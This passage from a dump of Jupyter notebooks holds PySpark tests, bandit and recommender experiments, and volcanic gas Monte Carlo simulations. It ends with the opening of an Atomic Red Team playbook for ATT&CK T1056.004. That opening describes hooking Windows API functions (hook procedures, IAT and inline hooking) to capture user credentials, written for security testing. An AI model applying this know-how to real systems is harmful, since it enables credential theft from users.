test_add_null_index_array(self):\n df = spark.createDataFrame([\n Row(id=1, test_null=None),\n Row(id=2, test_null=1)\n ])\n df = df.transform(container.add_null_index_array)\n result = df.collect()\n self.assertEqual(2, len(result), \"Two records are expected\") \n self.assertIn(\"nulls\", df.columns, \"Nulls column not present\")\n self.assertIsNone(result[0].test_null, \"First record should contain null\")\n self.assertIsNotNone(result[1].test_null, \"Second record should not contain null\")\n self.assertIn(1, result[0].nulls, \"Nulls array should include 1\")\n self.assertIsNot(result[1].nulls, \"Nulls array should be empty\")\n \n def test_filter_null_index_empty(self):\n df = spark.createDataFrame([\n Row(id=1, test_null=None, nulls=[1]),\n Row(id=2, test_null=1, nulls=[])\n ])\n df = df.transform(container.filter_null_index_empty)\n result = df.collect()\n self.assertEqual(1, len(result), \"One record is expected\")\n self.assertNotIn(\"nulls\", df.columns, \"Nulls column not present\")\n \n def test_filter_null_index_not_empty(self):\n df = spark.createDataFrame([\n Row(id=1, test_null=None, nulls=[1]),\n Row(id=2, test_null=1, nulls=[])\n ])\n df = df.transform(container.filter_null_index_not_empty)\n result = df.collect()\n self.assertEqual(1, len(result), \"One record is expected\")\n self.assertIn(\"nulls\", df.columns, \"Nulls column not present\")\n \n def test_agg_count_by_country(self):\n df = spark.createDataFrame([\n Row(country=\"Country0\"),\n Row(country=\"Country1\"),\n Row(country=\"Country0\")\n ])\n df = df.transform(container.agg_count_by_country)\n result = df.collect()\n self.assertEqual(2, len(result), \"Two records expected\")\n self.assertIn(\"country\", df.columns, \"Country column not present\")\n self.assertIn(\"count\", df.columns, \"Count column not present\")\n d = {r[0]: r[1] for r in result}\n self.assertEqual(2, d.get(\"Country0\", -1), \"Country0 count should be 2\")\n self.assertEqual(1, d.get(\"Country1\", -1), \"Country1 count should be 1\")\n",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb52d309c58c0f127424e9c399aa5e6dd4e21836 | 38,915 | ipynb | Jupyter Notebook | examples/fix_budget_bai_multi_armed_bandit.ipynb | Alanthink/banditpylib | ba6dc84d87ae9e9aec48cd622ec9988dccdd18c6 | [
"MIT"
] | 20 | 2020-02-05T23:53:18.000Z | 2021-07-16T21:06:16.000Z | examples/fix_budget_bai_multi_armed_bandit.ipynb | Alanthink/banditpylib | ba6dc84d87ae9e9aec48cd622ec9988dccdd18c6 | [
"MIT"
] | 18 | 2020-02-06T00:23:26.000Z | 2021-07-06T16:37:10.000Z | examples/fix_budget_bai_multi_armed_bandit.ipynb | Alanthink/banditpylib | ba6dc84d87ae9e9aec48cd622ec9988dccdd18c6 | [
"MIT"
] | 8 | 2020-02-06T00:05:10.000Z | 2021-09-18T17:24:29.000Z | 145.749064 | 16,060 | 0.876449 | [
[
[
"import numpy as np\nimport tempfile\nimport json\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(style=\"darkgrid\")\n\nimport logging\nlogging.getLogger().setLevel(logging.INFO)\n\nfrom banditpylib import trials_to_dataframe\nfrom banditpylib.arms import BernoulliArm\nfrom banditpylib.bandits import MultiArmedBandit\nfrom banditpylib.protocols import SinglePlayerProtocol\nfrom banditpylib.learners.mab_fbbai_learner import Uniform, SR, SH",
"_____no_output_____"
],
[
"budget = 1000\nmeans = np.random.uniform(0, 1, 50)\narms = [BernoulliArm(mean) for mean in means]\nbandit = MultiArmedBandit(arms=arms)\nlearners = [Uniform(arm_num=len(arms), budget=budget, name='Uniform Sampling'), \n SR(arm_num=len(arms), budget=budget, name='Successive Rejects'),\n SH(arm_num=len(arms), budget=budget, name='Sequential Halving')]\n# For each setup, we run 500 trials\ntrials = 500\ntemp_file = tempfile.NamedTemporaryFile()",
"_____no_output_____"
],
[
"game = SinglePlayerProtocol(bandit=bandit, learners=learners)\n# Start playing the game\n# Add `debug=True` for debugging purpose\ngame.play(trials=trials, output_filename=temp_file.name)",
"INFO:absl:start Uniform Sampling's play with multi_armed_bandit\nINFO:absl:Uniform Sampling's play with multi_armed_bandit runs 2.14 seconds.\nINFO:absl:start Successive Rejects's play with multi_armed_bandit\nINFO:absl:Successive Rejects's play with multi_armed_bandit runs 3.83 seconds.\nINFO:absl:start Sequential Halving's play with multi_armed_bandit\nINFO:absl:Sequential Halving's play with multi_armed_bandit runs 1.72 seconds.\n"
],
[
"trials_df = trials_to_dataframe(temp_file.name)",
"_____no_output_____"
],
[
"trials_df.head()",
"_____no_output_____"
],
[
"fig = plt.figure()\nax = plt.subplot(111)\nsns.barplot(x='total_actions', y='regret', hue='learner', data=trials_df)\nplt.xlabel('pulls')\nplt.ylabel('error_probability')\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))",
"_____no_output_____"
],
[
"fig = plt.figure()\nax = plt.subplot(111)\nsns.barplot(x='total_actions', y='rounds', hue='learner', data=trials_df)\nplt.xlabel('pulls')\nplt.ylabel('communication_rounds')\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb52da2d02cc4b842a43fc72b62bfaece0b87eca | 5,142 | ipynb | Jupyter Notebook | surprise.ipynb | rowantseng/RecSys | 49818edb6c2dee0f80fa8985da73300b65aab663 | [
"MIT"
] | 1 | 2021-07-27T09:03:47.000Z | 2021-07-27T09:03:47.000Z | surprise.ipynb | rowantseng/RecSys | 49818edb6c2dee0f80fa8985da73300b65aab663 | [
"MIT"
] | null | null | null | surprise.ipynb | rowantseng/RecSys | 49818edb6c2dee0f80fa8985da73300b65aab663 | [
"MIT"
] | null | null | null | 21.974359 | 173 | 0.524893 | [
[
[
"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport joblib\nfrom surprise import NMF, SVD, SVDpp\nfrom surprise import Dataset\nfrom surprise.accuracy import mae as MAE\nfrom surprise.accuracy import mse as MSE\nfrom surprise.model_selection import train_test_split\n\nseed=12",
"_____no_output_____"
]
],
[
[
"## Hyperparameters",
"_____no_output_____"
]
],
[
[
"# Set for training\nfeatureNum = 10\nlr = 2e-3\nepochs = 50\n\n# Set for regularization\nregRate = 1e-2",
"_____no_output_____"
]
],
[
[
"## Load and Split Data",
"_____no_output_____"
]
],
[
[
"data = Dataset.load_builtin(\"ml-100k\")\ntrainSet, validSet = train_test_split(data, test_size=0.2, random_state=seed)",
"_____no_output_____"
],
[
"print(f\"{trainSet.n_users} users, {trainSet.n_items} items, and {trainSet.n_ratings} ratings in train\")\nprint(f\"Missing rate of train: {(1-trainSet.n_ratings/(trainSet.n_users*trainSet.n_items))*100:.3f}%\")",
"943 users, 1651 items, and 80000 ratings in train\nMissing rate of train: 94.862%\n"
],
[
"numValidRates = len(validSet)\nprint(f\"{numValidRates} ratings in valid\")\nprint(f\"Missing rate of valid: {(1-numValidRates/(trainSet.n_users*trainSet.n_items))*100:.3f}%\")",
"20000 ratings in valid\nMissing rate of valid: 98.715%\n"
]
],
[
[
"## Train and Validate FunkSVD using MSE and MAE",
"_____no_output_____"
]
],
[
[
"funksvd = SVD(n_factors=featureNum, n_epochs=epochs, lr_all=lr, reg_all=regRate, random_state=seed)\nfunksvd.fit(trainSet)\n\n# Save model\nwith open(\"surprise/funksvd.joblib\", \"wb\") as f:\n joblib.dump(funksvd, f)\n\n# Evaluate\npredSvd = funksvd.test(validSet)\nmse = MSE(predSvd)\nmae = MAE(predSvd)",
"MSE: 0.8645\nMAE: 0.7316\n"
]
],
[
[
"## Train and Validate SVD++ using MSE and MAE",
"_____no_output_____"
]
],
[
[
"svdpp = SVDpp(n_factors=featureNum, n_epochs=epochs, lr_all=lr, reg_all=regRate, random_state=seed)\nsvdpp.fit(trainSet)\n\n# Save model\nwith open(\"surprise/svdpp.joblib\", \"wb\") as f:\n joblib.dump(svdpp, f)\n\n# Evaluate\npredSvdpp = svdpp.test(validSet)\nmse = MSE(predSvdpp)\nmae = MAE(predSvdpp)",
"MSE: 0.8267\nMAE: 0.7121\n"
]
],
[
[
"## Train and Validate NMF using MSE and MAE",
"_____no_output_____"
]
],
[
[
"nmf = NMF(n_factors=featureNum, n_epochs=epochs, reg_pu=lr, reg_qi=lr, biased=True, reg_bu=regRate, reg_bi=regRate, lr_bu=regRate, lr_bi=regRate, random_state=seed)\nnmf.fit(trainSet)\n\n# Save model\nwith open(\"surprise/nmf.joblib\", \"wb\") as f:\n joblib.dump(nmf, f)\n\n# Evaluate\npredNmf = nmf.test(validSet)\nmse = MSE(predNmf)\nmae = MAE(predNmf)",
"MSE: 0.9592\nMAE: 0.7623\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb530ffd03965403a76730c2988010d27dd12a45 | 115,651 | ipynb | Jupyter Notebook | article_calculations/Monte_carlo_simulations.ipynb | Nicholaswogan/Volcano-Speciation | 2cd48e04097c2c06c215d354165cbd8dfdee3106 | [
"MIT"
] | null | null | null | article_calculations/Monte_carlo_simulations.ipynb | Nicholaswogan/Volcano-Speciation | 2cd48e04097c2c06c215d354165cbd8dfdee3106 | [
"MIT"
] | null | null | null | article_calculations/Monte_carlo_simulations.ipynb | Nicholaswogan/Volcano-Speciation | 2cd48e04097c2c06c215d354165cbd8dfdee3106 | [
"MIT"
] | null | null | null | 211.815018 | 54,336 | 0.895038 | [
[
[
"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport time\nfrom tqdm import tqdm\nfrom VolcGases.functions import solve_gases\n\nimport warnings\nwarnings.filterwarnings('ignore')",
"_____no_output_____"
],
[
"# The total H and C mass fractions\nmCO2tot=1000e-6\nmH2Otot=1000e-6\n\n# set total pressure and temperature\nT = 1473 # kelvin\nP = 1000 # bar\nx = 0.01550152865954013\nFMQ = 0\n\n# set the Oxygen fugacity to FMQ\nA = 25738\nB = 9\nC = 0.092\nlog_FMQ = (-A/T+B+C*(P-1)/T)\nf_O2 = 10**(log_FMQ+FMQ)\n# set to FMQ\n\nstart = time.time()\nP_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)\nprint(time.time()-start)\nprint('H2O mix rat =','%.2e'%(P_H2O/P))\nprint('H2 mix rat =','%.2e'%(P_H2/P))\nprint('CO2 mix rat =','%.2e'%(P_CO2/P))\nprint('CO mix rat =','%.2e'%(P_CO/P))\nprint('CH4 mix rat =','%.2e'%(P_CH4/P))\nprint('alphaG =','%.2e'%alphaG)",
"0.14644694328308105\nH2O mix rat = 1.68e-03\nH2 mix rat = 3.52e-05\nCO2 mix rat = 9.49e-01\nCO mix rat = 4.89e-02\nCH4 mix rat = 8.13e-12\nalphaG = 4.53e-04\n"
],
[
"# make distributions\nnp.random.seed(1)\nn = 10000\n\ninputs = range(0,n)\n\n# change these too\nmCO2toto_r=[-5,-2] # Approximate range in Earth MORB Wallace and Anderson 1999, Marty et al. 2012, Wallace 2005\nmH2Ototo_r=[-5,-1] # Dissolved submarine range for Earth Wallace and Anderson 1999\n # Figure 10\nmCO2totc_r=[-5,-2] # Approximate range in Earth MORB Wallance and Anderson 1999, Marty et al. 2012, Wallace 2005\nmH2Ototc_r=[-5,-1] # Dissolved subaerial range for Earth Wallace and Anderson 1999\n # Figure 11\nmCO2toto = 10**np.random.uniform(low=mCO2toto_r[0], high=mCO2toto_r[1], size=n)\nmH2Ototo = 10**np.random.uniform(low=mH2Ototo_r[0], high=mH2Ototo_r[1], size=n)\nmCO2totc = 10**np.random.uniform(low=mCO2totc_r[0], high=mCO2totc_r[1], size=n)\nmH2Ototc = 10**np.random.uniform(low=mH2Ototc_r[0], high=mH2Ototc_r[1], size=n)\n#mCO2totc = mCO2toto\n#mH2Ototc = 10**mH2Ototo\n\n# Choose range of T and P and fO2\nTc_r = [873,1973] # coldest magmas to Komatiite magmas ( ,Huppert et al. 1984)\nPc_r = [1e-3,100] # Roughly subaerial degassing pressure range in the solar system\nTo_r = [873,1973] # coldest magmas to Komatiite magmas ( ,Huppert et al. 1984)\nPo_r = [100,1000] # Magma solubility doesn't allow for siginifcant degassing at higher pressure\nf_O2_r = [-4,5] # Range of O2 fugacities observed on Earth (Stamper et al. 2014)\n # White dwarfs pollution are evidence that similar O2 fuagacities on exoplanets (Doyle et al. 2019)\n # encompasses O2 fugacity of martian meteorites (Catling and Kasting 2017)\nX_r = [0,1] # 0% to 100% subaerial volcanism\n\nLG = 1\nDelta_f_O2 = np.random.uniform(low=f_O2_r[0], high=f_O2_r[1], size=n)\nTc = np.random.uniform(low=Tc_r[0], high=Tc_r[1], size=n)\nPc = np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)\nTo = np.random.uniform(low=To_r[0], high=To_r[1], size=n)\nPo = np.random.uniform(low=Po_r[0], high=Po_r[1], size=n)\nX = np.random.uniform(low=X_r[0], high=X_r[1], size=n)\nif LG==1:\n # log stuff\n Pc_r = [np.log10(Pc_r[0]),np.log10(Pc_r[1])]\n Pc = 10**np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)\n\n\n# little bit more to get f_O2\nA = 25738\nB = 9\nC = 0.092\nlog_fO2_c = (-A/Tc+B+C*(Pc-1)/Tc)+Delta_f_O2\nf_O2_c = 10**(log_fO2_c)\n\nlog_fO2_o = (-A/To+B+C*(Po-1)/To)+Delta_f_O2\nf_O2_o = 10**(log_fO2_o)",
"_____no_output_____"
],
[
"# ocean world \ndef flux_ratios_iter(T,P,f_O2,mCO2tot,mH2Otot):\n P_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)\n #CO_CO2 = P_CO/P_CO2\n try:\n CO_CO2 = P_CO2/P_CO\n CO_CH4 = P_CH4/P_CO\n except:\n CO_CO2 = np.nan\n CO_CH4 = np.nan\n# CO2 = 1000*alphaG*x*(1/(1-alphaG))*P_CO2/P\n# CH4 = 1000*alphaG*x*(1/(1-alphaG))*P_CH4/P\n# CO = 1000*alphaG*x*(1/(1-alphaG))*P_CO/P\n\n if P_H2O==0:\n print('hi')\n \n CO2 = 1000*alphaG*x*P_CO2/P\n CH4 = 1000*alphaG*x*P_CH4/P\n CO = 1000*alphaG*x*P_CO/P\n \n\n return (CO_CO2,CO_CH4,CO,CH4,CO2)\n\nnum_cores = multiprocessing.cpu_count()\nstart = time.time()\nresultso = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\\\n (To[i],Po[i],f_O2_o[i],mCO2toto[i],mH2Ototo[i]) for i in tqdm(inputs))\nend = time.time()\nprint(end-start)\n\nresultso = np.array(resultso)",
"100%|██████████| 10000/10000 [00:22<00:00, 436.10it/s]\n"
],
[
"# mix land-ocean world\ndef flux_ratios_iter(To,Tc,Po,Pc,f_O2_o,f_O2_c,mCO2toto,mH2Ototo,mCO2totc,mH2Ototc,X):\n P_H2O_o,P_H2_o,P_CO2_o,P_CO_o,P_CH4_o,alphaG_o,x_CO2_o,x_H2O_o = solve_gases(To,Po,f_O2_o,mCO2toto,mH2Ototo) \n P_H2O_c,P_H2_c,P_CO2_c,P_CO_c,P_CH4_c,alphaG_c,x_CO2_c,x_H2O_c = solve_gases(Tc,Pc,f_O2_c,mCO2totc,mH2Ototc)\n \n \n # this gives mol gas/kg magma\n# CO2_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO2_o/Po)\n# CO_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO_o/Po)\n# CH4_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CH4_o/Po)\n \n CO2_b = X*(1000*alphaG_c*x*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO2_o/Po)\n CO_b = X*(1000*alphaG_c*x*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO_o/Po)\n CH4_b = X*(1000*alphaG_c*x*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CH4_o/Po)\n \n # this gives mol gas/kg magma\n P_CO2_b = X*(P_CO2_c/Pc)+(1-X)*(P_CO2_o/Po)\n P_CO_b = X*(P_CO_c/Pc)+(1-X)*(P_CO_o/Po)\n P_CH4_b = X*(P_CH4_c/Pc)+(1-X)*(P_CH4_o/Po)\n\n try:\n CO_CO2 = P_CO2_b/P_CO_b\n CO_CH4 = P_CH4_b/P_CO_b\n \n except:\n CO_CO2 = np.nan\n CO_CH4 = np.nan\n \n# CO_CO2 = X*(P_CO_c/P_CO2_c)+(1-X)*(P_CO_o/P_CO2_o)\n# CO_CH4 = X*(P_CO_c/P_CH4_c)+(1-X)*(P_CO_o/P_CH4_o)\n\n return (CO_CO2,CO_CH4,CO_b,CH4_b,CO2_b)\n\nnum_cores = multiprocessing.cpu_count()\nstart = time.time()\nresultsb = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\\\n (To[i],Tc[i],Po[i],Pc[i],f_O2_o[i],f_O2_c[i],mCO2toto[i],mH2Ototo[i],mCO2totc[i],mH2Ototc[i],X[i]) for i in tqdm(inputs))\nend = time.time()\nprint(end-start)\n\nresultsb = np.array(resultsb)",
"100%|██████████| 10000/10000 [00:31<00:00, 317.07it/s]\n"
],
[
"#np.savetxt('ocean_world.txt',resultso)\n#resultso = np.loadtxt('ocean_world.txt')\n\n#np.savetxt('ocean_continent_combo.txt',resultsb)\n#resultsb = np.loadtxt('ocean_continent_combo.txt')",
"_____no_output_____"
],
[
"plt.rcParams.update({'font.size': 18})\n\n\nfig,[ax,ax1] = plt.subplots(1,2,figsize=[15,5])\nresults = resultsb\n# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)\n# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)\nxbins = np.linspace(-27,5, 20)\nybins = np.linspace(-1, 5, 20)\n\ncounts1, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),normed=True)\ncs1 = ax1.pcolormesh(xbins, ybins, counts1.T,vmin=0, vmax=np.max(counts1))\n#ax1.set_ylabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CO_2})$\")\n#ax1.set_xlabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CH_4})$\")\nax1.set_ylabel(r\"$\\log(\\mathrm{CO_2}/\\mathrm{CO})$\")\nax1.set_xlabel(r\"$\\log(\\mathrm{CH_4}/\\mathrm{CO})$\")\n#ax1.set_xticks(np.arange(0,22,5))\n#cbar1 = plt.colorbar(cs1,ax=ax1)\n#cbar1.set_label(\"Probability density\")\n\n\nfig.subplots_adjust(right=0.8)\ncbar_ax = fig.add_axes([0.82, 0.13, 0.02, 0.74])\ncbar = fig.colorbar(cs1, cax=cbar_ax)\n\nresults = resultso\n# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)\n# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)\nxbins = np.linspace(-27,5, 20)\nybins = np.linspace(-1, 5, 20)\n#counts, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),normed=True)\n#cs = ax.pcolormesh(xbins, ybins, counts.T,vmin=0, vmax=np.max(counts1))\nax.hist2d(np.log10(results[:,1]), np.log10(results[:,0]),bins=(xbins, ybins),normed=True,vmax=np.max(counts1))\n#ax.set_ylabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CO_2})$\")\n#ax.set_xlabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CH_4})$\")\nax.set_ylabel(r\"$\\log(\\mathrm{CO_2}/\\mathrm{CO})$\")\nax.set_xlabel(r\"$\\log(\\mathrm{CH_4}/\\mathrm{CO})$\")\n#cbar = plt.colorbar(cs,ax=ax)\ncbar.set_label(\"Normalized count\")\n#ax.set_xticks(np.arange(0,22,5))\nplt.subplots_adjust(wspace=.3)\n\nax.text(-0.15, 1.15, '(a)', transform=ax.transAxes,size=25)\nax1.text(-0.15, 1.15, '(b)', transform=ax1.transAxes,size=25)\n\nax.set_ylim(ax.get_ylim()[0],ax.get_ylim()[1])\nax.set_xlim(ax.get_xlim()[0],ax.get_xlim()[1])\nax1.set_ylim(ax1.get_ylim()[0],ax1.get_ylim()[1])\nax1.set_xlim(ax1.get_xlim()[0],ax1.get_xlim()[1])\nax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')\nax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')\nxxx = np.linspace(-40,10)\nax.plot(xxx,xxx*0,'w:')\nax.plot(xxx*0,xxx,'w:')\n\nax1.plot(xxx,xxx*0,'w:')\nax1.plot(xxx*0,xxx,'w:')\n\nnum_nan = np.sum(np.isnan(resultso[:,1]))\nprint('fraction of Ocean world calculations where CH4/CO2>1 = ',\\\n len(np.where(resultso[:,1][~np.isnan(resultso[:,1])]>1)[0])/(n-num_nan))\n\nnum_nan = np.sum(np.isnan(resultsb[:,1]))\nprint('fraction of Earth-like world calculations where CH4/CO2>1 = ',\\\n len(np.where(resultsb[:,1][~np.isnan(resultsb[:,1])]>1)[0])/(n-num_nan))\n\n\n# ax.set_xlim(-27,5)\n# ax.set_ylim(-1,5)\n\n# plt.savefig(\"both.pdf\",bbox_inches='tight')\n\nplt.show()",
"fraction of Ocean world calculations where CH4/CO2>1 = 0.06612492033142128\nfraction of Earth-like world calculations where CH4/CO2>1 = 0.01645429918731815\n"
],
[
"plt.rcParams.update({'font.size': 18})\nmod_earth = 30*3000*1e9\n\nfig,[[ax2,ax3],[ax4,ax5]] = plt.subplots(2,2,figsize=[14,10])#,gridspec_kw={'height_ratios':[3,2]})\n\n#ax.set_xticks(np.arange(0,22,5))\nplt.subplots_adjust(wspace=.3,hspace=.35)\n\n# ax.text(-0.15, 1.10, '(a)', transform=ax.transAxes,size=25)\n# ax1.text(-0.15, 1.10, '(b)', transform=ax1.transAxes,size=25)\nax2.text(-0.15, 1.10, '(a)', transform=ax2.transAxes,size=25)\nax3.text(-0.15, 1.10, '(b)', transform=ax3.transAxes,size=25)\nax4.text(-0.15, 1.10, '(c)', transform=ax4.transAxes,size=25)\nax5.text(-0.15, 1.10, '(d)', transform=ax5.transAxes,size=25)\n\n# ax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')\n# ax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')\nax2.text(0.02, 0.89, 'Ocean world', transform=ax2.transAxes,color='k')\nax3.text(0.02, 0.89, 'Earth-like world', transform=ax3.transAxes,color='k')\nax4.text(0.02, 0.89, 'Ocean world', transform=ax4.transAxes,color='k')\nax5.text(0.02, 0.89, 'Earth-like world', transform=ax5.transAxes,color='k')\n\nax4.arrow\n\n\n#plt.savefig(\"both.pdf\",bbox_inches='tight')\n\n# now other things\n\nbins = np.arange(-32,2,1.5)\nax2.set_xticks(np.arange(-32,1,6))\nax3.set_xticks(np.arange(-32,1,6))\nax2.hist(np.log10(resultso[:,3]),bins = bins,normed=True)\nax2.set_ylabel('Normalized count')\nax2.set_xlabel('log(mol $\\mathrm{CH_4}$/kg magma)')\n\nax3.hist(np.log10(resultsb[:,3]),bins = bins,normed=True)\nax3.set_ylabel('Normalized count')\nax3.set_xlabel('log(mol $\\mathrm{CH_4}$/kg magma)')\n\nax2.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])\nax3.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])\n\nax2.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])\nax3.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])\n\nax2.set_yticks([0.,0.02,0.04,0.06])\nax3.set_yticks([0.,0.02,0.04,0.06])\n\n# now gas fluxes\nbins1 = np.arange(-31,8,1.5)\nax4.set_xticks(np.arange(-30,2,6))\nax5.set_xticks(np.arange(-30,2,6))\nax4.hist(np.log10(resultso[:,3]*mod_earth/1e12),bins = bins1,normed=True)\n\nax4.set_ylabel('Normalized count')\nax4.set_xlabel('Methane flux (log(Tmol/yr))')\n\nax5.hist(np.log10(resultsb[:,3]*mod_earth/1e12),bins = bins1,normed=True)\n\nax5.set_ylabel('Normalized count')\nax5.set_xlabel('Methane flux (log(Tmol/yr))')\n\nax4.set_xlim(ax4.get_xlim()[0],3.5)\n\nax4.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])\nax5.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])\n\nax4.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])\nax5.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])\n\nax4.set_yticks([0.,0.02,0.04,0.06])\nax5.set_yticks([0.,0.02,0.04,0.06])\n\n\nEbio = 30\nlims = ax4.get_xlim()\nval = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])\nax4.text(val,.71,'Mod.\\nEarth\\nbio.\\nflux',ha='center',va='bottom', transform=ax4.transAxes,fontsize = 12)\nax4.arrow(val, .7, 0, -0.69, transform=ax4.transAxes, length_includes_head=True\\\n ,head_width = .03,fc='k')\n\nlims = ax5.get_xlim()\nval = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])\nax5.text(val,.61,'Mod.\\nEarth\\nbio.\\nflux',ha='center',va='bottom', transform=ax5.transAxes,fontsize = 12)\nax5.arrow(val, .6, 0, -0.59, transform=ax5.transAxes, length_includes_head=True\\\n ,head_width = .03,fc='k')\n\n\n\nvolc_flux = 1\nprint('Fraction ocean world calulations where CH4 > 10 Tmol assuming\\n'+str(volc_flux)+\\\n ' times Earths magma production rate =',1-(np.sum(resultso[:,3]*volc_flux*mod_earth/1e12 < 10))/n)\nprint()\nprint('Fraction Earth-like world calulations where CH4 > 10 
Tmol assuming\\n'+str(volc_flux)+\\\n ' times Earths magma production rate =',1-(np.sum(resultsb[:,3]*volc_flux*mod_earth/1e12 < 10))/n)\n\n# plt.savefig(\"CH4_prod.pdf\",bbox_inches='tight')\nplt.show()",
"Fraction ocean world calulations where CH4 > 10 Tmol assuming\n1 times Earths magma production rate = 0.0018000000000000238\n\nFraction Earth-like world calulations where CH4 > 10 Tmol assuming\n1 times Earths magma production rate = 0.0004999999999999449\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5312f8bf6e2062d5dad38bb0e8ab66c831e9e3 | 5,068 | ipynb | Jupyter Notebook | playbook/tactics/credential-access/T1056.004.ipynb | haresudhan/The-AtomicPlaybook | 447b1d6bca7c3750c5a58112634f6bac31aff436 | [
"MIT"
] | 8 | 2021-05-25T15:25:31.000Z | 2021-11-08T07:14:45.000Z | playbook/tactics/credential-access/T1056.004.ipynb | haresudhan/The-AtomicPlaybook | 447b1d6bca7c3750c5a58112634f6bac31aff436 | [
"MIT"
] | 1 | 2021-08-23T17:38:02.000Z | 2021-10-12T06:58:19.000Z | playbook/tactics/credential-access/T1056.004.ipynb | haresudhan/The-AtomicPlaybook | 447b1d6bca7c3750c5a58112634f6bac31aff436 | [
"MIT"
] | 2 | 2021-05-29T20:24:24.000Z | 2021-08-05T23:44:12.000Z | 58.930233 | 1,312 | 0.719613 | [
[
[
"# T1056.004 - Input Capture: Credential API Hooking\nAdversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n",
"_____no_output_____"
],
[
"## Atomic Tests",
"_____no_output_____"
]
],
[
[
"#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force",
"_____no_output_____"
]
],
[
[
